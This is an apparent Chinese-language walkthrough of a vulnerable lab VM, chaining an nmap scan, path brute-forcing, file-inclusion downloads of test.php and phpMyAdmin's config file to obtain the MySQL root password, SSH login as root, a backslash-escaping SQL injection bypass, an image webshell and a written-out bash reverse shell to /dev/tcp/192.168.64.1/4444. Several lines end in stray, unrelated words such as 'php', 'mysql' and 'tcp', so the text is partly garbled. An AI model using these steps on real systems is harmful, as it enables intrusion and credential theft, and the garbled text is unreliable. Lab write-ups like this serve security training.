运行虚拟机直接上nmap扫描 获取靶场ipphp
nmap 192.168.18.*mysql
开放端口 linux
192.168.18.143 打开页面 爆破路径 获得sql
一次打开 发现 test.phpshell
要一个file 猜想多是文件包含 输入数据库
成功下载文件 bash
in.php 是phpinfo 文件tcp
ctril+f 搜索 SCRIPT_FILENAME 获得跟路径函数
把刚刚暴露的文件依次下载发现 c.php 里面有链接mysql 的帐号密码 在phpmyadmin 下可能存在默认配置文件编码
在尝试读取phpmyadmin的默认配置文件 file=/var/www/phpmy/config.inc.php 获得mysql root 的帐号密码
root密码:roottoor 既然已经获取了 他的22端口开着能够尝试登陆
登陆成功 root权限
这里我也能够看到原先主页的sql 注入 提示 下载源码
对单引号作了转义 这样我想起来 一个ctf 题 也是对单引号进行转义 直接利用 在单引号前面加个反斜杠对反斜杠进行转义构建slq注入语句
成功注入登陆成功
进去查看页面发现 panel.php 利用任意下载漏洞 下载 在前面源码中也有包含 panel.php 文件的代码
代码审计发现 文件包含 上传一张图片马让后包含
利用以前扫描出来的路径查看 /uploaded_images/
让后直接包含
这里 能够在 马里写一个get 请求反弹shell
cmd=echo "bash -i >& /dev/tcp/192.168.64.1/4444 0>&1" | bash cmd 后门的命令须要url 编码
链接
打开虚拟终端输入 u'na'me -a ‘不影响命令读取
差很少两种提权思路